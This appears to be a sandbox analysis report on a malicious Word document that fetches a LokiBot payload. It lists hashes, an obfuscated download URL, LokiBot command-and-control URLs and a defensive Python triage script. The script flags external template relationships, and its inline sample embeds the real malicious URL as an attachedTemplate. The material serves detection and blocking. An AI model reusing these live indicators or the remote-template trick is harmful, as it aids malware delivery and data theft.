General
Target: RE PO02366.docx
Size: 10KB
Sample: 230222-xckkcseg61
MD5: 352573ea247c865918062df15a57fd90
SHA1: 69699e27cfc37916b60c5b63340c550f1750810d
SHA256: 0fc64d847655fe5a6f90a06fbb2ca5f5e4848701c4f18c1d2cda39aca390952e
SHA512: 8ef10f279da88da64d69d58843d875d4d922438e09eb3896a2392ebc91b1b9dcca27fa3acaba52cc2d0403c365dac139a583378cd4ecdcc41471e7227ad13f8b
SSDEEP: 192:ScIMmtP0xfUW70vG/b3kgOi4OUdVuus+1pReDnc37yCdt:SPX+si10ni4OiVMyeDnMuCr
Static task: static1
Behavioral task: behavioral1 (sample RE PO02366.docx, resource win10-20230220-en)
Behavioral task: behavioral2 (sample RE PO02366.docx, resource win7-20230220-en)
Behavioral task: behavioral3 (sample RE PO02366.docx, resource win10v2004-20230220-en)
Malware Config
Extracted (URL the document fetches from its external location):
http://QQZQQQQZZZZZQQQQQQQOOOOOQQQQQOOQOQOZZZOOOOOOOZZZZZOOOOOQOQQQOQOQOQOQOQOQOZZZOZOQQOQOQOQOQOQOZ@3235029245/OO-OO-OO.DOC
Note on the URL above: everything before the "@" is a URL userinfo component (ignored by the fetcher, present only to clutter string-based detection), and the host is an IPv4 address written as a single decimal integer: 3235029245 = 192.210.160.253. The request therefore goes to http://192.210.160.253/OO-OO-OO.DOC, so block or hunt on the dotted-quad form, not the literal string.
Extracted (lokibot C2):
http://208.67.105.148/sung/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
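The following script is an added example and is not part of the sandbox report or of the malware author's tooling. It reproduces the "Abuses OpenXML format to download file from external location" finding statically: it unzips a .docx, lists every relationship whose TargetMode is External, flags the relationship types that Word resolves on open without a click, and canonicalises the target URL (strips the userinfo decoy, converts a decimal or 0x-hex integer host to dotted quad) so the indicator you block is the one that actually goes on the wire. The .docx it runs on is constructed inline for the demo: the real sample's internal layout is not shown on the page, so placing the extracted URL in an attachedTemplate relationship under word/_rels/settings.xml.rels, the benign hyperlink to example.com, and the AUTO_FETCH_TYPES heuristic are all assumptions.

```python
"""
Static triage for an OpenXML document with an external relationship.
Added example; not from the sandbox report. The sample .docx is built
in memory below and is a constructed stand-in, not the real file.
"""
import io
import ipaddress
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit, urlunsplit

PKG_REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

# Relationship types Word resolves on its own when the file is opened
# (no user click). Analyst heuristic (assumption); hyperlinks are external
# too but need interaction, so they are reported without the auto flag.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject"}

# Download URL exactly as the sandbox extracted it from this sample.
EXTRACTED_URL = "http://QQZQQQQZZZZZQQQQQQQOOOOOQQQQQOOQOQOZZZOOOOOOOZZZZZOOOOOQOQQQOQOQOQOQOQOQOZZZOZOQQOQOQOQOQOQOZ@3235029245/OO-OO-OO.DOC"


def decode_host(host: str) -> str:
    """Turn a host written as a decimal or 0x-hex integer into dotted quad;
    any other host is just lowercased. Out-of-range integers are left alone."""
    h = host.strip().lower()
    try:
        if h.startswith("0x"):
            n = int(h, 16)
        elif h.isdigit():
            n = int(h, 10)
        else:
            return h
        return str(ipaddress.IPv4Address(n))  # raises if n > 2**32 - 1
    except ValueError:  # AddressValueError is a ValueError subclass
        return h


def normalize_url(url: str) -> dict:
    """Split the URL the way a fetcher does: drop userinfo, canonicalise
    the host, keep path and query. Reports what was rewritten."""
    parts = urlsplit(url)
    raw_host = parts.hostname or ""
    host = decode_host(raw_host)
    try:
        port = parts.port
    except ValueError:  # junk port; treat as absent
        port = None
    netloc = host if port is None else f"{host}:{port}"
    return {
        "url": urlunsplit((parts.scheme.lower(), netloc, parts.path, parts.query, "")),
        "host": host,
        "userinfo": parts.username is not None,
        "rewritten_host": host != raw_host,
    }


def external_relationships(docx_bytes: bytes) -> list:
    """Every Relationship with TargetMode="External" in any *.rels part."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(PKG_REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append({"part": name, "id": rel.get("Id"), "type": rtype,
                              "target": rel.get("Target"),
                              "auto_fetch": rtype in AUTO_FETCH_TYPES})
    return found


def triage(docx_bytes: bytes) -> list:
    """External relationships with their targets canonicalised."""
    out = []
    for rel in external_relationships(docx_bytes):
        info = normalize_url(rel["target"])
        out.append({**rel, "clean_url": info["url"], "host": info["host"],
                    "userinfo_decoy": info["userinfo"]})
    return out


def build_sample_docx() -> bytes:
    """Constructed minimal .docx (assumption, not the real sample): one
    internal rel, one external hyperlink, one attachedTemplate pointing
    at the extracted URL."""
    ns = PKG_REL_NS[1:-1]
    doc_rels = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{ns}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/" TargetMode="External"/>
</Relationships>'''
    settings_rels = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{ns}">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="{EXTRACTED_URL}" TargetMode="External"/>
</Relationships>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/document.xml.rels", doc_rels)
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in triage(build_sample_docx()):
        flag = "AUTO-FETCH" if hit["auto_fetch"] else "on-click"
        print(f"{hit['part']} {hit['id']} {hit['type']:<16} {flag:<10} {hit['clean_url']}"
              + ("  (userinfo decoy stripped)" if hit["userinfo_decoy"] else ""))
```

Run it against a real suspect file by replacing `build_sample_docx()` with the file's bytes; any auto-fetch hit whose clean host is an IP or a newly registered domain is the indicator to submit to blocking, and the `rewritten_host` flag tells you the literal URL string in the sample would not have matched a plain string-based rule.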
Targets
Target: RE PO02366.docx
Score: 10/10
Signatures:
- Blocklisted process makes network request
- Downloads MZ/PE file
- Abuses OpenXML format to download file from external location
- Executes dropped EXE
- Loads dropped DLL
- Uses the VBS compiler for execution
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext